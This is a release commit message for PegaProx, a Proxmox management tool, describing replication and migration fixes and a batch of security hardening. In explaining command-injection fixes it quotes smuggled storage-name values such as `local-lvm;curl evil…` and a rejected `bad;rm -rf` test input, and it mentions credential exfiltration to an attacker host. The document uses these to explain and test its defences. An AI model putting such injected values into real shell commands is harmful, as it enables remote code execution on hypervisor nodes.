Nico Schmidt 403a04935c
release: v0.9.12.0 — monitoring expansion + perf + security hardening (#513)
* docs(readme): add Plugins link to nav (plugins.pegaprox.com)

* fix(xcrepl): race condition (#455) + identity preservation (#456)

#455 (race condition):
- Scheduler now tracks in-flight job IDs (set + lock in cross_cluster_replication.py)
- Skip the tick when previous run still executing — was killing it via "stale replica" cleanup
- Manual trigger endpoint returns 409 Conflict instead of spawning a duplicate thread
- Thread wrapper releases the slot on completion (or failure)

#456 (identity preservation):
- Capture source hostname (LXC) / name (QEMU) + per-NIC MAC BEFORE the clone
  overwrites them — was leaking the temp xcrepl-{vmid}-tmp label to the replica
- Restore both on the target after remote-migrate completes
- MAC swap preserves bridge / VLAN-tag / rate / firewall tokens — only the
  MAC token is replaced, everything else inherits from migration
- Supports LXC (hwaddr=) and QEMU (virtio= / e1000= / vmxnet3 / etc.) NIC formats
- Best-effort — replication doesn't fail if identity restore trips
- Architectural-question (vzdump + pct restore --unique 0) parked for later
  discussion — surgical fix unblocks DR users today

* fix(#413): xcrepl safety gate — never delete unrelated VMs on target

Reported by @blackshocks. Earlier xcrepl flow deleted any VM on the target
that happened to share the source VMID, on the assumption that the VMID
collision had to be a previous run of this same job. Real-world scenario:
freshly paired clusters where the target already held an unrelated VM at
the matching VMID. The delete destroyed user data.

Replicas are now tagged on successful migration with two markers:
  - `pegaprox-replica` (general)
  - `xcrepl-job-<job_id>` (job-specific)

The safety gate before the delete checks for the job-specific tag and
refuses to proceed if it's missing — so an unrelated VM at the matching
VMID stays put and the run errors out cleanly with an actionable message
telling the operator how to recover (tag the stranded replica manually
or pick a different target VMID).

Cross-job protection: two unrelated xcrepl jobs colliding on the same
target VMID can't nuke each other's replicas, the job-specific tag has
to match.

Existing replicas from pre-v0.9.12 runs are NOT tagged — operators
either tag them manually (error message tells them how) or accept one
failed run + manual cleanup before the new run creates a fresh, tagged
replica.

Verified against real PegaProx instance + real LXC 107 (untagged) +
synthetic configs covering all 6 gate paths.

* fix(#451): login input text invisible in Modern UI corporateLight theme

Reported by @thefiredragon. Modern UI's `corporateLight` theme sets
`body.light-theme` while Corporate Layout's light mode sets
`data-corp-theme="light"` — two separate gating attributes. The existing
text-white override (line 1184) only catches the corp-layout path, so
the Modern UI's near-white (#fafafa) background was rendering the
white-text login inputs as invisible typed text.

Surgical fix: add `body.light-theme input.text-white` +
`body.light-theme textarea.text-white` overrides so input/textarea
text becomes dark-grey on the light bg. Scoped to input/textarea only
so the orange submit-button's intentional `text-white` stays white.

Verified by curl-ing the served `/` from local PegaProx — rule lands in
the rendered HTML, single selector count. Browser hard-reload picks it
up immediately (CSS-only, no server restart needed).

* fix(#438): v2p sshfs+drive_mirror live-pivot wasn't updating persistent config

Reported by @crcro. Three rounds of support-bundles eventually pinned this:

In `_do_sshfs_boot_migration` (v2p.py around line 4977), the `drive_mirror -n`
live-pivot updates QEMU's runtime view of the disk to the local target but
does NOT update the persistent VM config (`/etc/pve/qemu-server/<vmid>.conf`).
The attach-disks block (`qm set --scsi0=<vol_id>`, boot order, etc.) was gated
behind `if not mirror_success:` — so when the live-pivot DID succeed, none of
the persistent config update ran. Symptom: VM works post-migration as long as
QEMU stays running, then any reboot finds no disk in config and won't boot.
The .raw / .qcow2 files end up orphaned on storage with no VM referencing them.

Reporter's bundle (post-completion run, 2026-05-27) showed the full trace:

  [V2P:0911ff8e] === ALL DISKS MIGRATED TO LOCAL STORAGE (live pivot) ===
  [V2P:0911ff8e] Configuring VM with local disks...
  ...
  Final VM config:
    agent: enabled=1
    bios: seabios
    [... 14 more lines ...]
    sockets: 1
    vga: vmware
  # ← no scsi0 / virtio0 / boot anywhere

Fix: add the persistent-config update inside the mirror_success branch too.
Cleans stale args/boot/unused/old-scsi sshfs references, then writes
`scsi0=<local-vol-id>` for each migrated disk and sets boot order. VM keeps
running off the in-memory pivoted disk, but the config now also reflects it
so reboots survive.

EFI / sector-size / VM-start steps stay only in the not-mirror-success path
since those are creation-time concerns that were already handled at VM
creation in the mirror-success flow.

E2E verify limitation: no vSphere source available in the local dev env,
so this is code-review + static-check + log-flow-trace verified, not a
live re-run of a v2p migration. Next migration on @crcro's side validates.

* feat(audit): emit terminal-phase events for migration + replication paths

v0.9.12-prep. Discovered while debugging #438 + #413 across three days of
support-bundle round-trips: vmware/xhm/xcrepl async paths only audit the
.started event, never .completed/.failed. That forces every silent-failure
investigation into log archaeology with the journalctl-permission-block dance
each time, instead of just reading the audit log.

Three central hook-points cover ~150 individual exit points:
  - V2PMigrationTask.set_phase (v2p.py:138)
  - XHMigrationTask.set_phase (xhm.py:178)
  - _update_repl_status (vms.py:_update_repl_status)

Each now emits a terminal audit event on `completed` or `failed` with the
relevant identity (VM name + target VMID for v2p, direction + source/target
cluster+node for xhm, job_id for xcrepl) and the failure reason on `failed`.
All wrapped in try/except so a broken audit write can't tank the task.

Audit-action namespace:
  - vmware.migration.{completed,failed}  ← matches existing .started
  - xhm.migration.{completed,failed}
  - replication.{completed,failed}       ← matches existing .triggered

E2E verified against running pegaprox: instantiated V2PMigrationTask in a
python process, called set_phase('failed', 'unit-test simulated error'),
confirmed audit_log row landed in DB with the right action + detail. Test
entry then deleted.

Next #438 bundle should show the failure-reason in audit_log directly. Same
for #413 once the failover thread hits a terminal phase. Saves the
log-window-vs-audit-event timing game on every future bundle.

* fix(security): Added cluster-scoped authorization validation to prevent unauthorized cluster deletion via check_cluster_access() in the DELETE endpoint. (#459)

Co-authored-by: aikido-autofix[bot] <119856028+aikido-autofix[bot]@users.noreply.github.com>

* fix(security): Added VM-specific authorization validation to prevent unauthorized disk manipulation during storage migration operations. (#460)

Co-authored-by: aikido-autofix[bot] <119856028+aikido-autofix[bot]@users.noreply.github.com>

* fix(security): Fixed cross-tenant RBAC bypass vulnerability in custom role CRUD operations by adding tenant-scoped authorization validation. (#470)

Co-authored-by: aikido-autofix[bot] <119856028+aikido-autofix[bot]@users.noreply.github.com>

* fix(security): Fixed authorization bypass vulnerability by validating scheduled task actions to prevent privilege escalation from vm.start to node.update permissions. (#461)

Co-authored-by: aikido-autofix[bot] <119856028+aikido-autofix[bot]@users.noreply.github.com>

* fix(security): Fixed heredoc terminator injection vulnerabilities in hosts, DNS, and certificate management by using UUID-based dynamic delimiters instead of fixed heredoc terminators. (#468)

Co-authored-by: aikido-autofix[bot] <119856028+aikido-autofix[bot]@users.noreply.github.com>

* fix(security): Added cluster-scoped authorization validation to HA management endpoints to prevent unauthorized access to clusters outside user scope. (#467)

Co-authored-by: aikido-autofix[bot] <119856028+aikido-autofix[bot]@users.noreply.github.com>

* fix(security): Added object-level authorization to PBS API endpoints to enforce cluster-based access control and prevent unauthorized cross-server operations. (#476)

Co-authored-by: aikido-autofix[bot] <119856028+aikido-autofix[bot]@users.noreply.github.com>

* fix(security): Added cluster-level access control checks to all 15 plan-specific site recovery API endpoints to enforce authorization for both source and target clusters. (#474)

Co-authored-by: aikido-autofix[bot] <119856028+aikido-autofix[bot]@users.noreply.github.com>

* fix(security): Fixed authorization bypass vulnerability in VMware VM operations by adding VM-level access control checks across all destructive endpoints. (#478)

Co-authored-by: aikido-autofix[bot] <119856028+aikido-autofix[bot]@users.noreply.github.com>

* fix(security): Added cluster-level and VM-level access control validation to cross-hypervisor migration planning and execution endpoints to prevent unauthorized VM migrations. (#463)

Co-authored-by: aikido-autofix[bot] <119856028+aikido-autofix[bot]@users.noreply.github.com>

* fix(security): Fixed unauthorized console ticket minting vulnerability by validating VM existence on target vCenter before issuing credentials. (#462)

Co-authored-by: aikido-autofix[bot] <119856028+aikido-autofix[bot]@users.noreply.github.com>

* fix(security): Fixed Server-Side Request Forgery (SSRF) vulnerability by implementing PBS host validation and allowlisting in pegaprox/core/pbs.py and pegaprox/api/pbs.py. (#475)

Co-authored-by: aikido-autofix[bot] <119856028+aikido-autofix[bot]@users.noreply.github.com>

* fix(security): Fixed CSV formula injection vulnerability in audit log exports by sanitizing fields to neutralize spreadsheet formula-triggering characters. (#483)

Co-authored-by: aikido-autofix[bot] <119856028+aikido-autofix[bot]@users.noreply.github.com>

* fix(security): command injection prevention via storage-name validation + shlex.quote (#481 port)

Manual port of closed Aikido autofix #481 (closed-superseded by mistake during
the batch-merge sweep — re-review showed it had unique, critical coverage that
no other PR replaced).

What was actually exposed: `storage` / `target_storage` params land in
`pvesm path` / `pvesm alloc` / `pvesm status` shell commands on the PVE node
across 7+ call sites. A user with cluster.config + storage-list access (e.g.
storage-balancer role) could craft a storage name like `local-lvm;curl evil…`
and execute arbitrary shell on the node — straight RCE class.

Defence in two layers:

1. New `validate_storage_name()` helper in utils/sanitization.py — regex-locks
   to `^[a-zA-Z0-9][a-zA-Z0-9_\-\.]{0,99}$`. Called at the api boundary in
   `iso_sync_trigger`, `start_vmware_migration`, `xhm_start` before the
   request ever reaches the worker thread.

2. `shlex.quote()` wraps at every pvesm shell-cmd construction site
   (defence-in-depth, also catches names that bypassed the api gate via DB
   direct-write / migration-from-pre-fix-saved-state):
   - core/manager.py:11280  `pvesm path {storage}:...`
   - core/v2p.py:656         `pvesm path {target_storage}:1`
   - core/v2p.py:3277        `pvesm alloc {target_storage}`
   - core/v2p.py:5434        `pvesm status --storage {target_storage}`
   - core/xhm.py:717,1811,1861  three `pvesm alloc {target_storage}` cmds
   - core/v2p.py:1681 already had shlex.quote (kept)

Added `import shlex` to xhm.py (was missing).

Smoke-tested: imports OK, validate_storage_name accepts legit storage names
(local-lvm, tgt01-nfs-hdd, good.storage_1) and rejects injection attempts
(`bad;rm -rf`, empty).

* fix(security): credential-exfil guard on PBS + VMware host changes (#469 port)

Manual port of closed Aikido autofix #469 (closed-superseded by mistake during
the batch sweep — re-review showed it addresses a different vuln class than #476
which I cited; ported manually).

Vulnerability: when updating a PBS or VMware server entry, the UI lets you keep
the saved credentials by sending password/api_token_secret/ssh_key as `********`.
PegaProx replaces the masked value with the real stored credential and then calls
`mgr.connect()`. If the user ALSO changed the host/port in the same edit, that
real credential gets sent to the new host — potentially attacker-controlled
(social-engineering-driven cred-exfil; admin gets tricked into pointing the
server at evil-server.example).

Fix: detect `host_changed AND credentials_preserved` at the same time → set the
manager to `connected=False` with a clear `last_error` instead of auto-connecting.
Operator must explicitly use Test Connection after verifying the new host. The
non-suspicious code paths (host unchanged, OR fresh credentials supplied) keep
auto-connecting as before.

Both update endpoints get the guard:
- `update_pbs_server` (api/pbs.py)
- `update_vmware_server` (api/vmware.py)

vmware.py was missing `import logging` for the warning line — added.

* fix(security): VM-level ACL gate on site-recovery add_plan_vm (#477 port)

Manual port of closed Aikido autofix #477 (closed-superseded by mistake — re-review
showed it had VM-level granular coverage that #474 did not).

#474 (already merged) added cluster-level `check_cluster_access` on all 15 plan
endpoints, which is the necessary baseline. But cluster-level access alone is
not sufficient on `add_plan_vm`: a user with cluster-view permission but no
ACL for a specific VM could otherwise add that VM to a recovery plan, then
trigger a Test Failover or Planned Failover and act on a VM they shouldn't
touch. The cluster-gate would pass each time because the plan IS on a cluster
the user can see.

Fix: in add_plan_vm, after the cluster-access gate, also check
`user_can_access_vm(user, plan['source_cluster'], vmid, 'vm.view', vm_type)`.
Returns 403 if denied. The other plan endpoints (delete_plan_vm, etc.) don't
need this — they operate on already-added rows that went through this gate.

* fix(security): cluster-scoped auth on PBS backup-verification endpoints (#465 port)

Manual port of closed Aikido autofix #465 (closed-superseded by mistake — #476
which I cited covered the `/api/pbs/<pbs_id>/*` endpoints via `check_pbs_access`
but did NOT touch the `/api/clusters/<cluster_id>/backup-verify*` endpoints
which use a completely different auth-key. They went un-protected after that
merge — the gap was unintentional on my side, not Aikido's).

Three endpoints get a `check_cluster_access(cluster_id)` gate after the
existing `@require_auth(perms=['vm.backup'])` decorator:

- `POST   /api/clusters/<cluster_id>/backup-verify`         start_backup_verification
- `GET    /api/clusters/<cluster_id>/backup-verify/<task>`  get_backup_verification_status
- `GET    /api/clusters/<cluster_id>/backup-verify/history` get_backup_verification_history

Pattern matches the existing cluster-access checks across the codebase. No
behavioral change for users with proper cluster ACL; 403 for cross-cluster
attempts.

* fix(#484): preserve maintenance flag on offline nodes + SSE heartbeat every tick

Two bugs reported in #484, both surface when a node in HA maintenance
gets rebooted:

* manager.get_node_status() offline branch — when status_data is None
  (node mid-reboot, or circuit breaker open) the per-node dict was built
  without 'maintenance_mode'/'maintenance_task'/'maintenance_acknowledged'.
  Sidebar reads metrics.maintenance_mode → undefined → renders '(Offline)'
  with no maintenance indicator, even though nodes_in_maintenance still
  has the entry and PVE still has the HA flag set. Same fix applied to
  the ha_node_status fallback below it (covers full /nodes drop-out).

* broadcast loop — heartbeat was gated on `loop_count % 5 == 0`. With a
  dead node the per-cluster fan-out walls on the 8s thread-join cap each
  cycle, so heartbeat drifts out to ~40s between beats. Frontend's wedge
  threshold is 30s → SSE flapping in reconnect loop. Send heartbeat
  every iteration instead, one tiny message per second is nothing.

Verified locally with the dev instance + an in-process probe that hits
the offline branch directly. Customer should retest the reboot path on
Testing build.

* fix(#413): SR background task no longer crashes on broadcast_sse + tolerate PVE 9.x SDN list payload

Two issues surfaced in @blackshocks's journalctl bundle:

* `[SR] Background task crashed for plan ...: broadcast_sse() missing 1
  required positional argument: 'data'` — `_broadcast_progress()` was
  invoking `broadcast_sse({...})` with a single dict, but the helper
  signature is `(update_type, data, cluster_id=None)`. Every progress
  emit in the failover path therefore killed the worker, which is why
  Test/Planned/Emergency Failover all show as "running" forever in the
  UI without an outcome event landing. Split the call into the proper
  `('site_recovery', {...})` form. Same broken pattern was also in
  `core/xcpng.py:1673,1680` (XCP-NG task-poll loop) — fixed alongside.

* `SDN availability check failed: 'list' object has no attribute 'get'`
  — PVE 9.x returns `/cluster/sdn` as a list of available SDN endpoints
  (zones, vnets, ipams, …). Older clusters returned a dict carrying a
  digest. The code unconditionally called `.get('digest')` on it. Added
  an isinstance guard so the digest is read only when PVE actually
  exposes a dict; list payloads are accepted silently.

Reported by @blackshocks via #413 debug bundle.

Verified by isolated REPL probe: `_broadcast_progress('test', 'msg', 42)`
runs clean post-fix where it previously raised TypeError. SDN guard is a
defensive isinstance check, no live trigger needed.

* fix(#413): Proxmox-target SR test failover couldn't find any VM (missing get_vms shim)

After the broadcast_sse signature fix this morning (fc77cd5) the SR
worker no longer crashes — so the test failover actually runs to
completion. @blackshocks's screenshot is now hitting the next layer:
"VM not found on target" for every VM in the plan.

Root cause: `execute_test_failover` / `_migrate_vm` in
`pegaprox/background/site_recovery.py` resolve VMs on the target via
`mgr.get_vms(node_name) if hasattr(mgr, 'get_vms') else []`. The method
exists on `vmware.py` / `xcpng.py` / `esxi_cluster.py` but not on the
main Proxmox manager — that one exposes `get_vm_resources()` instead.
So for a Proxmox→Proxmox plan the `hasattr` check returned False and
the lookup silently fell back to an empty list, producing "VM not
found on target" for every VM, every time.

Fix: add a uniform `get_vms(node=None)` shim on `PegaProxManager` that
proxies to `get_vm_resources()` and optionally filters to one node.
Same list shape as the other managers; no SR-side changes required.

Reported by @blackshocks via #413 (post-fix retest).

Verified via isolated REPL probe — FakeMgr backed by the existing SR
detection loop now resolves VMIDs by node correctly.

* fix(#413): SR detection — target_vmid awareness + null-tgt guard + sweep logging

@blackshocks's bundle (20260528_113247) shows the test failover ran to
completion after a9c0045 but still reported "VM not found on target".
The recent_tasks confirm xcrepl had just rebuilt VM 103 on the target
node ~28s before the SR test fired, so the lookup *should* have hit —
but with zero log output from the SR detection sweep we can't tell from
the bundle whether get_node_status() came back empty, whether the
get_vms shim returned an empty list, or whether the vmid match itself
failed. Symptom only, no signal.

Three changes to close that gap:

* Honour `site_recovery_vms.target_vmid` when set (column exists in the
  schema but was never read). Falls back to the source vmid for the
  common case where PVE qmigrate / our xcrepl preserve the ID.

* Guard against `tgt_mgr is None` up front. Was relying on the outer
  `except Exception` catching the AttributeError, which masked the
  cluster-disconnected case behind a generic "VM not found".

* `logger.info` the sweep at three points: which VMID we're looking for
  and which nodes we'll probe, per-node VM list count + vmids, and the
  miss line if detection ends empty. Next bundle should tell us in one
  glance what PegaProx actually saw.

Reported by @blackshocks via #413 (third bundle).

No E2E here — restart denied + no SR plan configured in dev env. The
logging additions are pure observability, no behaviour change for the
happy path; target_vmid fallback only kicks in when the column is
populated (currently never via UI/API).

* fix(security): aikido findings — SSL outlier + docker.yml job-scoped perms

Two real fixable items from the latest Aikido scan (aikido_issues(3).csv,
2026-05-27 batch). Other findings triaged but not changed:

* `pegaprox/core/manager.py:7932` was the lone `self.session.post(..., verify=False)`
  call in the file — every other PVE-API call routes through `_create_session()`
  which already honours per-cluster `self._ssl_verify`. For the default
  self-signed-PVE-cert user (`_ssl_verify=False`, set on init) behaviour is
  identical — the helper still produces `session.verify=False`. The only
  behaviour change is for operators who explicitly opted into
  `ssl_verification=True` on a cluster (i.e. they pinned a custom CA) —
  that one outlier call was the only place still bypassing their choice.
  REPL-probe verified both directions resolve to the expected verify value.

* `.github/workflows/docker.yml:14` had `packages: write` at the workflow
  top-level so any future job we add silently inherits the GHCR write
  capability. Moved to job-scoped `permissions:` on `build-and-push` so
  the cap is granted only to the job that actually pushes.

Triaged-no-change (false positives or out-of-scope):
- `plugins/status_page/status.html:299` — the setHTMLSafe() wrapper uses a
  *detached* `<template>.innerHTML` then `_stripDangerousNodes()` before
  adopting via replaceChildren. Aikido pattern-matched innerHTML; the
  surrounding sanitiser is the documented defence-in-depth shape.
- `web/index.html:{1618,3758,21125}` and the five `-----BEGIN ... KEY-----`
  hits — every match is a textarea **placeholder** showing users what
  format to paste their key/cert in. Decoded the suspicious base64 on
  line 4979: `b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAA=` is literally just the
  OpenSSH magic header + "none" cipher field, zero key material.
- `pegaprox/core/manager.py:{5527,5797,5864,5925,5941}` path-traversal —
  paths are `os.path.join(heartbeat_dir, f'<prefix>_{node}')` where node
  comes from PVE's `/api2/json/nodes`, server-controlled. Compromise of
  PVE makes path traversal of HA log files the least of our worries.
  Could add a `validate_hostname()` gate as defence-in-depth — left as
  a Nico-decision since it's 5 callsites with no demonstrated threat.
- `ssl/acme_account.key` — file is `.gitignore`d (`ssl/*.key` rule) and
  `pegaprox/core/acme.py:_load_or_create_account_key` auto-generates a
  fresh key on install. But the file WAS committed in `f8c12d5` (v0.9.4
  release Mar 2026), so the key is still in git history. Repo-history
  scrub on main is a force-push-class operation — flagged for Nico.

Verified via isolated REPL probe of `_create_session()` for both
`_ssl_verify` modes. The docker.yml change is metadata-only, no functional
impact on PegaProx itself.

* fix(security): kill first-run hardcoded-creds takeover — setup wizard replaces default pegaprox/admin

Aikido AI-pentest finding (real, not a false positive). On every fresh
install `load_users()` auto-bootstrapped `pegaprox` / `admin` with
ROLE_ADMIN before the operator even saw the UI. Any network attacker
who could reach the port before setup-completion could log in with the
publicly-documented credentials, and the `force_password_change=True`
flag was advisory-only — the session was issued anyway and every
ROLE_ADMIN-gated route accepted it. First-run remote admin takeover.

Replaces the auto-bootstrap with an explicit setup wizard:

* `utils/auth.py`
  - `load_users()` no longer creates a default admin when none exists.
    Returns empty dict for uninitialised installs. Callers must check
    `is_initialized()` separately.
  - New `is_initialized()` — returns True if `ADMIN_INITIALIZED_FILE`
    exists OR users are already in the DB (handles upgrade from
    pre-setup-wizard builds).
  - New `backfill_initialized_marker()` — stamps the marker on startup
    for pre-existing users so upgrade is transparent.
  - `create_default_users()` removed. New `create_initial_admin(
    username, password, display_name, email)` shapes the dict from
    setup-wizard input.

* `api/auth.py`
  - `/api/auth/login`: returns `503 NOT_INITIALIZED` before any
    credential check when setup hasn't run. No more "is the default
    password set?" guessing for attackers.
  - New `/api/auth/setup` (unauth, since there is no session yet):
    accepts the operator's chosen username + password + optional
    display_name + email, validates the password policy, refuses the
    reserved name `pegaprox`, creates the first admin, marks the
    install as initialised. Replay returns `409 ALREADY_INITIALIZED`.
    Even if the marker file is deleted on-disk, the DB-second-opinion
    inside `is_initialized()` prevents a hijacker from racing setup
    against the existing admin's user record. Per-IP rate-limit
    (5/60s) is hygiene against username/password fuzzing.
  - `/api/auth/check` now surfaces `initialized: bool` in the 401
    body so the frontend knows when to render the wizard.

* `app.py`
  - Removed the "DEFAULT LOGIN CREDENTIALS" startup banner that
    literally printed `pegaprox/admin` to stdout.
  - Calls `backfill_initialized_marker()` once at startup.
  - Prints a `FIRST-RUN SETUP REQUIRED` banner only when uninitialised.
  - `/api/auth/setup` added to the CSRF-exempt list (unauth flow,
    same as `/api/auth/login`).

* Frontend
  - `contexts.js`: `AuthProvider` reads `initialized` from /auth/check
    response and exposes a `needsSetup` flag.
  - `dashboard.js`: render `<SetupWizard />` instead of `<LoginScreen />`
    when `needsSetup && !user`.
  - `auth.js`: new `SetupWizard` component — branded landing page,
    username + password + confirm-password + optional display_name +
    optional email, client-side validation mirrors server, POSTs to
    `/api/auth/setup`, success → reload so AuthProvider re-checks.
  - Frontend rebuilt (`web/index.html`).

Migration:
  Existing installs are untouched. On first boot of this build,
  `backfill_initialized_marker()` stamps ADMIN_INITIALIZED_FILE if
  any user exists in the DB, so login keeps working.

E2E (Flask test_client + temp config dir, no live server needed):
  Stage 1  fresh install: is_initialized=False, no users
  Stage 2  backfill upgrade: marker written for existing users
  Stage 3  full wipe back to fresh
  Stage 4  pre-setup login → 503 NOT_INITIALIZED
  Stage 5  /auth/check pre-setup → initialized=false
  Stage 6  weak password rejected (policy: 8+ chars, upper/lower/digit)
  Stage 7  reserved username `pegaprox` rejected
  Stage 8  setup happy path creates admin + marks initialised
  Stage 9  replay rejected (409 ALREADY_INITIALIZED)
  Stage 10 new admin can log in
  Stage 11 old hardcoded pegaprox/admin no longer works (401)
  Stage 12 marker-deletion attack blocked by DB second-opinion
  Plus isolated probe: 6th setup attempt within 60s → 429

* feature: Add DNS-01 challenge support for certificate requests

Fixes: #420
Sponsored-by: credativ GmbH <https://credativ.de>

* fix: default 15s request timeout to prevent dead-cluster UI hangs

When a PVE cluster went unreachable mid-session, the UI froze for 30+
seconds per request because ~14 callsites in this module used the
authenticated session without an explicit `timeout=` kwarg. requests
defaults to None there, so each call would wait out the OS-level TCP
keepalive before failing — multiple back-to-back calls compounded into
multi-minute freezes (one for each panel the user clicked on a dead
cluster).

Rather than chase down every `_create_session().get(...)` / `.post(...)`
callsite (and the next dozen that will get added) the wrapper in
`_create_session()` now injects a default `timeout=15` whenever the
caller didn't specify one (or explicitly passed `None`). Callsites that
already had `timeout=X` keep winning — only the missing-or-None case
gets filled in.

Verified against TEST-NET-1 (192.0.2.0/24, RFC 5737 reserved unreachable):
  - no timeout                → ConnectTimeout after 15.0s (was: 120s+)
  - explicit timeout=2        → 2.0s (caller wins)
  - explicit timeout=None     → 15.0s (safety net still engages)

Caveat: `connect_to_proxmox()` still iterates fallback_hosts
sequentially, so a fully-dark cluster with 3-4 fallbacks can still
freeze the calling thread up to ~60s worst-case. That's a separate
follow-up (parallel-probe via gevent.spawn) but the per-request bound
already eliminates the runaway-multi-minute case.

* feat: cluster worldmap — offline geo-view with zoom + capitals

New top-level sidebar entry "World Map" / "Weltkarte" that plots each
configured cluster as a dot on an equirectangular world map. Bundled
country SVG from Natural Earth (public domain, ~140 KB) so it works
without any external tile-server — air-gap installs are fine.

Backend
─ Schema migration adds `latitude REAL`, `longitude REAL`, `location_label TEXT`
  to the clusters table. save_cluster preserves location across unrelated
  edits (e.g. password rotate) so the dot doesn't disappear off the map
  every time the operator touches the cluster config.
─ PegaProxConfig picks up the three fields, GET /api/clusters surfaces
  them.
─ New endpoint `PUT /api/clusters/<id>/location` with strict validation:
  - lat -90..90, lon -180..180, both-set-or-both-null pattern (`null,null`
    clears the dot)
  - rejects bool / dict / list / non-numeric (Python's bool-is-int
    subclassing trap would silently coerce True → 1.0 otherwise)
  - location_label sanitised: control chars 0x00-0x1F + 0x7F stripped,
    capped at 120 chars (prevents audit-log multi-line injection)
  - per-(IP, cluster) rate-limit: 30 updates / 60s window — defends the
    HMAC-signed audit log from authenticated spam
  - writes audit entry `cluster.location_updated`, mirrors into
    mgr.config so the next /api/clusters GET reflects the change
─ New asset route `GET /assets/<path>` with 1-day Cache-Control. Same
  send_from_directory pattern as /images/, blocks ../ traversal.

Frontend
─ web/src/worldmap.js — three components:
  - `<WorldMap />` renders the country SVG (theme-aware via CSS vars:
    dark slate-on-deep-blue / light soft-grey-on-pale-blue), overlays
    dots with pulsing rings, white halo for contrast on either theme.
  - `<WorldMapView />` is the fullscreen container with cluster list
    sidebar and inline `<ClusterLocationEditor />`.
─ Zoom + pan controls (right edge buttons + mouse-wheel anchor-on-cursor
  + click-drag-pan). Range 1× to 8×, dot/ring sizes shrink with
  `1/sqrt(scale)` so they don't dominate at high zoom.
─ Country capitals layer — 202 cities from Natural Earth's
  ne_110m_populated_places_simple (Admin-0 capitals only, sorted by
  population). Progressive disclosure: dots from 1.2×, labels from 2.5×,
  toggle button (★) overrides at any zoom. Greedy collision-avoidance
  walks capitals in pop-desc order and drops labels whose AABB overlaps
  any already-placed label box (Conakry / Freetown / Monrovia and
  Brazzaville / Kinshasa used to mush together at moderate zoom).

The countries SVG itself was generated from world-atlas@2 with two
fixes vs. the naive equirectangular emit:
─ Antimeridian-safe path generation. Russia / Fiji / Kuril Islands
  used to draw a horizontal line across the entire map when their
  arcs crossed ±180°; the generator now inserts a Move instead of a
  Line whenever consecutive points differ by >180° longitude.
─ Fill/stroke set to CSS custom properties (`var(--wm-country-fill)`
  etc.) so the wrapper div's runtime palette swap actually re-themes
  the rendered map.

i18n
27 worldmap-specific keys added to all 7 supported languages
(de / en / fr / es / pt / ko / it). Fallback chain via `t()` keeps
unsupported languages on English.

Edge cases covered
─ Both SVG layers (countries + dot overlay) now share an explicit
  `aspectRatio: 2 / 1` on the wrapper + an injected inline style on
  the bundled SVG. Without this they rendered at different heights
  (countries: viewBox-aspect, overlay: container-height) and dots
  floated 70 px above their real country.
─ Empty-state when no cluster has a location set yet, with a CTA to
  the inline editor.
─ Status-aware dot colour (green=connected, amber=disconnected-but-
  running, red=offline) plus 8 px status-dot in the sidebar list.

Verified via:
─ E2E flask test_client (8 attack-vectors blocked on PUT /location:
  bool / list / dict types, control-char label injection, NaN, rate
  limit, etc.)
─ Headless-chromium playwright walk-through (8 view states: default,
  zoomed, capitals on, editor open, light theme, narrow viewport,
  cleared-state, restored)
─ Reference markers at known coordinates (NYC, TYO, SYD, NULL=0,0)
  confirm projection lands on the right continent at all zoom levels.

* fix(#413): Planned Failover detects qmigrate aborts mid-flight

After yesterday's three SR fixes (broadcast_sse signature, get_vms shim,
target_vmid + sweep logging) @blackshocks's Test Failover finally
succeeded end-to-end. Planned Failover then exposed the next layer:

`_migrate_vm_cross_cluster` treated the result of
`src_mgr.remote_migrate_vm(...)` as success-or-failure of the migration
itself, when actually it only reflects whether PVE accepted the UPID.
The qmigrate task can — and in this case did — abort mid-flight several
seconds later, leaving the source VM untouched and the target with the
old (pre-replicated) copy still in place. The old code happily marked
the failover as `planned_complete: 1/1 VMs`, the UI flipped to a
"Failback" button on a migration that never moved anything, and the
operator chased a phantom completed state.

Concrete from @blackshocks's bundle (`20260529_075654.zip`):

  recent_tasks audit row:
    UPID:pv01:...:qmigrate:103   status="migration aborted"
  audit_log row:
    site_recovery.planned_complete  "Plan 'cl1-cl2' planned completed: 1/1 VMs"

Both side by side: PVE says aborted, PegaProx says completed.

Fix: after a successful submit (UPID returned), poll the PVE task status
via the existing `_wait_for_task` helper from api/vms.py — same pattern
xcrepl uses for its qmigrate step. Only declare success if the task
ends with `OK` or `WARNINGS`. Otherwise propagate the real exitstatus
into the failover event + audit log.

Bonus: when the abort detail mentions "already exists", append a hint
pointing at Emergency Failover (which calls `_start_replicated_vm`
instead of trying to migrate over a pre-existing target VMID). That's
the most common cause we can identify from the error string and the
common cause for xcrepl-backed plans.

Defensive: imports are gated in a try/except so a future split of
api.vms wouldn't break SR; UPID-less success paths still treat as OK
to avoid making the function stricter than the prior contract on
paths we don't fully understand.

Reported by @blackshocks via #413. Next layer (semantically: should
Planned Failover for an xcrepl-pre-replicated plan auto-switch to
emergency-start-replica mode instead of trying to migrate?) is a
design question for Nico — parked as follow-up; this commit just
stops the false-positive.

* fix(security): shlex.quote target_storage in v2p qm-set --efidisk0 calls (#485 manual)

Aikido autofix PR #485 flagged that 7 callsites in pegaprox/core/v2p.py
embed `task.target_storage` directly into `qm set --efidisk0` shell
commands without shell-escaping. API-level validation in api/xhm.py
(`validate_storage_name`) already rejects shell metacharacters before
they reach this code, so the vulnerability is not exploitable today —
but defense-in-depth is cheap and matches the shlex.quote pattern
already used elsewhere in the same file for pvesm calls (lines 656,
1681, 3277, 4685, 5434).

Did NOT merge the original PR because it only added markdown analysis
docs + a `fix_command_injection.py` runner script — the actual source
file was never touched. Closing #485 with a pointer to this commit
instead.

Verification:
  grep -c "efidisk0 {task.target_storage}:1" pegaprox/core/v2p.py     → 0
  grep -c "efidisk0 {shlex.quote(task.target_storage)}:1" v2p.py      → 7
  shlex already imported (line 15)
  `import pegaprox.core.v2p` → clean

* ci: grant actions:write so gha-cache works on the docker build

The Aikido-tightening in d257647 moved permissions from workflow-level
to job-level. That kept the build-and-push job's effective permissions
identical to the original (contents:read + packages:write), so the
push to ghcr.io still works — but neither the original workflow nor
the tightened version granted `actions:write`, which is what the
`cache-from: type=gha` / `cache-to: type=gha,mode=max` lines actually
need. Result on prior runs: cache write fails silently with a warning,
every release rebuilds linux/amd64 + linux/arm64 from scratch (~5-8
min wall-time hit per release).

Adding `actions: write` job-scoped so the cache works and the next
release-cut hits the warm cache. Defense-in-depth argument hasn't
changed: only `build-and-push` gets the elevated perms, future jobs
added to this workflow start fresh from default-deny.

No code changes, just CI plumbing. Verifies on next push to main /
